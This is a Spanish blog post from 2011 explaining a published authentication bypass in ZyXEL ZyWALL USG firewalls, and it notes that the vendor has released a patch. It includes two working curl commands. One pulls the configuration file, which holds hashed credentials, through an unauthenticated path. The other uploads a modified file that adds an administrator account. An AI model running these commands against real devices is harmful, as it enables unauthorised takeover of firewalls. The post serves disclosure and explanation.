Archivo

jueves, 5 de mayo de 2011

Bypaseando un Firewall (ZyWALL)


     Un poco amarillista el titulo jeje.. se trata del firewall ZyWALL USG, que por cierto esta bien equipado, cuenta con un antivirus, antispam, sistema detección y prevencion (IDP), SPI, etc. etc...

     Este equipo cuenta con una interfaz web para hacer mas amigable su administración, la interfaz esta montada sobre un servidor Apache que tiene un modulo personalizado (mod_auth_zyxeil.so) que implementa la autenticación, y aquí hay algo interesante; algunas direcciones como /images/ /weblogin.cgi /language están configuradas con la directiva "AuthZyxelSkipPattern", esto significa que pueden ser accedidas sin autenticación, vamos bien hasta ahí? ok.. También existe un archivo llamado startup-config.conf que contiene entre otras cosas usuarios y contraseñas (hasheados).

     Así que, para ir "hilando" un poco veamos el ataque o mejor dicho el PoC que hicieron los investigadores de RedTeam, lo primero que hacen es descargarse el archivo startup-config.conf haciendo referencia a /images (de esta forma evitamos autenticarnos)
$ curl --silent -o startup-config.conf "https://192.168.0.1/cgi-bin/export-cgi/images/?category=config&arg0=startup-config.conf"

una vez con este archivo en nuestro poder, agregamos a mano un nuevo usuario y contraseña (hasheados), y subimos nuevamente el archivo de configuración, (aprovechando la configuracion del Apache, forzamos el upload). De esta manera ya podremos loguearnos con nuestra nueva cuenta ^_^

$ curl --silent -F ext-comp-1121=50 -F file_type=config -F nv=1 -F "file_path=@startup-config.conf;filename=startup-config.conf" https://192.168.0.1/cgi-bin/file_upload-cgi/images/

     Los modelos afectados son USG-20, USG-20W, USG-50, USG-100, USG-200, USG-300, USG-1000, USG-1050, y USG-2000. El vendedor ya libero el parche le 25 de Abril y solo hay q actualizar el firmware (los anteriores a esta fecha  se encuentran afectados)


Para mas información ...

http://www.redteam-pentesting.de/en/advisories/rt-sa-2011-003/-authentication-bypass-in-configuration-import-and-export-of-zyxel-zywall-usg-appliances
http://www.redteam-pentesting.de/en/advisories/rt-sa-2011-004/-client-side-authorization-zyxel-zywall-usg-appliances-web-interface

No hay comentarios: